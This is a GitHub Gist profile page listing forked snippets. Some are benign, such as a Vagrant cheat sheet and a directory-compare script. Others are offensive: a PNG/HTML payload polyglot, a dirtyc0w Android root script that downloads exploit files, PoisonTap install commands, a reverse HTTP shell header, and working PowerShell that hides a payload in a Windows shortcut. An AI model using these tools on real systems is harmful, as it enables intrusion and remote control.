Skip to content

Instantly share code, notes, and snippets.

View wikijm's full-sized avatar

wikijm

View GitHub Profile
# Compare-Directory.ps1
# Compare files in one or more directories and return file difference results
# Victor Vogelpoel <victor@victorvogelpoel.nl>
# Sept 2013
#
# Disclaimer
# This script is provided AS IS without warranty of any kind. I disclaim all implied warranties including, without limitation,
# any implied warranties of merchantability or of fitness for a particular purpose. The entire risk arising out of the use or
# performance of the sample scripts and documentation remains with you. In no event shall I be liable for any damages whatsoever
# (including, without limitation, damages for loss of business profits, business interruption, loss of business information,
@wikijm
wikijm / vagrant-cheat-sheet.md
Created November 12, 2015 17:55 — forked from wpscholar/vagrant-cheat-sheet.md
Vagrant Cheat Sheet

Typing vagrant from the command line will display a list of all available commands.

Be sure that you are in the same directory as the Vagrantfile when running these commands!

Common Vagrant Commands

  • vagrant up -- starts vagrant environment (also provisions only on the FIRST vagrant up)
  • vagrant status -- outputs status of the vagrant machine
  • vagrant halt -- stops the vagrant machine
  • vagrant reload -- restarts vagrant machine, loads new Vagrantfile configuration
  • vagrant provision -- forces reprovisioning of the vagrant machine
@wikijm
wikijm / html_png_polyglot.py
Created November 14, 2015 10:38 — forked from flabbergastedbd/html_png_polyglot.py
A simple fun python script written to hide actual payload in image pixels and adding the loader to a PNG file.
# Simple script to have fun with PNG+HTML polyglot
# WARNING: This script is not optimised and just written for fun
#
# Author : Bharadwaj Machiraju
#
# Requirements: Pillow
#
# http://blog.tunnelshade.in/2015/06/stegosploit-fun.html
import re
Verifying that +wikijm is my blockchain ID. https://onename.com/wikijm

Keybase proof

I hereby claim:

  • I am wikijm on github.
  • I am wikijm (https://keybase.io/wikijm) on keybase.
  • I have a public key whose fingerprint is B71E B273 AF5E 1935 2258 3367 404F ABD8 53A2 7A0F

To claim this, I am signing this object:

@wikijm
wikijm / root.sh
Created October 27, 2016 11:35 — forked from Arinerron/root.sh
"Root" via dirtyc0w privilege escalation exploit (automation script) / Android (32 bit)
#!/bin/bash
# Give the usual warning.
clear;
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
sleep 10;
clear;
# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";
@wikijm
wikijm / Pi.txt
Created December 9, 2016 12:39 — forked from jgamblin/Pi.txt
PoisonTap Install Commands
##Server:
sudo apt-get update && apt-get upgrade
sudo apt-get install screen nodejs nodejs-legacy git npm
sudo npm install websocket
git clone https://github.com/samyk/poisontap
screen
sudo node backend_server.js
##piZero:
sudo apt-get update && apt-get upgrade
@wikijm
wikijm / JSRat.ps1
Created December 12, 2016 14:36
Fileless JavaScript Reverse HTTP Shell
<#
Author: Casey Smith @subTee
License: BSD3-Clause
.SYNOPSIS
Simple Reverse Shell over HTTP. Execute Commands on Client.
@wikijm
wikijm / shortcut.ps1
Created January 3, 2017 08:32 — forked from 3gstudent/shortcut.ps1
Hide payload into Windows shortcut
$file = Get-Content "c:\test\test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("c:\test\test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = ' '+ $file
$Shortcut.Save()
<?php
/**
* Classe de connexion à la Freebox.
*
* N'hésitez pas à la surclasser pour définir vos propres méthodes s'appuyant
* sur celles qui sont présentes ici.
*
* Exemple d'utilisation :
* <?php
* require('freebox_client.class.php');